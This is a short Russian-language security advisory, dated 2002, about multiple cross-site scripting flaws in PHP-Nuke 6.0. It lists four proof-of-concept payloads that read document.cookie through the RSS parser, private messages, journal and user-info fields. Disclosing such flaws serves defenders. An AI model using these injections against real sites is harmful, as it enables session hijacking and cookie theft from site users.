Security Lab

Межсайтовый скриптинг в PHPNuke

Дата публикации:15.10.2002
Всего просмотров:1596
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: PHPNuke – портальная система для UNIX и Windows.

Уязвимость межсайтового скриптинга обнаружена в нескольких PHPNuke сценариях. Уязвимость позволяет атакующему выполнять произвольный код в контексте уязвимого Web сайта и может использоваться для перехвата опознавательной информации, хранящейся в куки пользователя. Пример:

  1. RDF/RSS Parser: (Risk: medium)
    <item rdf:about="http://www.somesite.dom">
    <title><script>alert('cookie: '+ document.cookie)</script></title>
    <link>http://www.somesite.dom/</link>
    <description>Puke It</description>
    </item>
    
  2. Private Messages (Risk: critical)
    <a href="X" onmouseover="alert(document.cookie">x</a> - в сообщения.
    
  3. Journal (Risk: critical)
    "<script> alert(document.cookie)</script>" - в любое место
    
  4. Your Info (Risk: critical)
    http://x/" onmouseover="alert(document.cookie) - в ваш URL.
    

Уязвимость обнаружена в Francisco Burzi PHP-Nuke 6.0

Ссылки: Multiple XSS vulnerabilites in PHPNuke